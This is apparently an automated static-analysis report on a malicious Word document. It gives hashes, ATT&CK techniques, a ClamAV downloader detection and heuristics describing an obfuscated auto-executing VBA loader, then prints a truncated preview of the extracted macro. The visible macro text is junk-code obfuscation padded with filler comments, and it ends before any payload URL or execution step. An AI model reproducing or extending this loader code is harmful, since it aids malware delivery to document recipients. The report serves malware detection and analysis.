Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 319019ec8cf18d0d…

MALICIOUS

Office (OLE)

Size: 248.5 KB
Created: 2019-10-09 06:21:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 0a47d774cd6bd5ef88e9a5aea6ae7f61
SHA-1: ca96fc03719f25801c4b69964a70a6e3bb2ef41e
SHA-256: 319019ec8cf18d0d64954ef9c16c195881200b5df5f5de8a452124865d04a4b3
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-executing loader that uses CreateObject and execution sinks, suggesting it downloads and executes a second-stage payload. The ClamAV detection name 'Doc.Downloader.Generic-7290502-0' further supports this downloader behavior.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7290502-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7290502-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 158164 bytes
SHA-256: edc997b8950dd84e427d24816040cd9dfb74468d9f8030c9e6bac6dd0edb4184

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "b00c50c0112"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "cb29833304005, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b07007c2080, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b17791x0x93, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x1b0b51xx9010, 3, 3, MSForms, TextBox"
Attribute VB_Control = "cc07994007401, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c0940b4000c08, 5, 5, MSForms, TextBox"

Attribute VB_Name = "x084xb58700"
Function b6x0038xc96cx()
On Error Resume Next
   'Central88004 Bauch Prairie, Cleoraville, Germany Future31268 Alayna Keys, North Emelia, Indonesia
c5800bb086x = False
'Principal70456 Will Lodge, Port Bertborough, Virgin Islands, British Lead5260 Konopelski Burgs, Lake Shania, Burundi
Select Case x3c060039c7x6
'Product3228 Bartell Underpass, East Johann, Panama Regional8864 Tyrell Roads, Weberton, Benin
         Case b85cc318x432
         'Product28520 D'Amore Inlet, New Michelle, Greece Global36381 Schumm Terrace, South Concepcion, Bulgaria
         'Legacy849 Aiden Hill, West Kennamouth, Cambodia Principal06422 Jessyca Club, Dooleyfurt, Cameroon
x7c42b0c703 = False
'Lead954 Jakubowski Neck, Zellachester, Turkey Product4300 Katheryn Mount, Buckridgeland, Bermuda
            x3x04464xb006 = x5c75x965718
            'International390 Britney Extension, Velvaborough, Mozambique Principal130 Joanie Junction, Wiegandbury, Palau
            x7073b3x6000 = CInt(b150cbxb99c04 - CByte(xc99005x3c02))
            'Future243 Rocky Mews, West Lurlinehaven, Luxembourg Customer94346 Harvey Extension, Lake Abbigail, Saint Martin
            x06b902c55840 = Cos(b487520b1x0)
'Dynamic50074 Koelpin Ville, East Marilouhaven, Equatorial Guinea Internal162 Anderson Route, Schroederview, Macedonia
x7400c60708 = False
'Regional330 Marlin Prairie, South Ana, Faroe Islands Future517 Noel Run, Stokesview, Saint Helena
            x92x6x7009b = Rnd(b483b90b00b0)
            'Chief0564 Maximus Curve, Odellview, American Samoa Global741 Emily Manors, Austentown, Bahrain
         Case b107x01cb0c60
         'Chief9779 Ullrich Stream, Maxbury, Virgin Islands, U.S. Legacy7929 Francesca Glen, Kamronshire, American Samoa
            x02c36c3200 = x0c1x2290cb
            'District110 Maximus Cliffs, Schadenside, Malaysia Future598 Katlyn Unions, Kaylachester, Poland
            b20c70509008 = CDbl(x070b00x280)
            'National89332 Abbott Islands, Port Enid, Spain Investor422 Henderson Shore, Andersonstad, Kuwait
End Select
'Lead710 Koby Ways, Lake Hector, Belize Investor5633 Turner Oval, Cronaburgh, Uzbekistan
x739110b06c1 = False
'Human387 Zboncak Run, North Miles, Algeria Customer3157 Savion Wall, Siennaview, Antarctica (the territory South of 60 deg S)
   'Forward08416 Wilmer Freeway, Parisianchester, Portugal Dynamic0839 Karina Avenue, Port Rainabury, Afghanistan
x36054b731b8b = True
'Product5314 Marquardt Ford, Reillyberg, Guyana Product78790 Keeling Grove, Stantonfort, Bangladesh
Select Case c37193098940
'Forward73914 Greyson Underpass, Leonoramouth, Russian Federation Customer833 Andy Villages, East Gunnarville, Nauru
         Case b832c2729433
         'International1728 Hammes Grove, South Matilde, Ghana Central3704 Favian Walk, Carrollside, Ukraine
         'Internal23182 Kyla Road, New Rahsaantown, Trinidad and Tobago Principal40022 Thompson Light, Rogahnshire, Zimbabwe
x312916x32073 = False
'Dynamic99901 Schroeder Rest, Ryanhaven, Bosnia and Herzegovina Regional830 Hubert Field, North Ansley, Japan
            xx73x07930207 = c33b426bb6x
            'National0838 Cassin Tunnel, East Abigailstad, Faroe Islands Global8726 Feeney Village, Ottilieborough, American Samoa
            x67004840x0 = CInt(b034104c4412c - CByte(c50x728043x1))
            'Corporate565 Legros Passage, Shanymouth, Eg
... (truncated)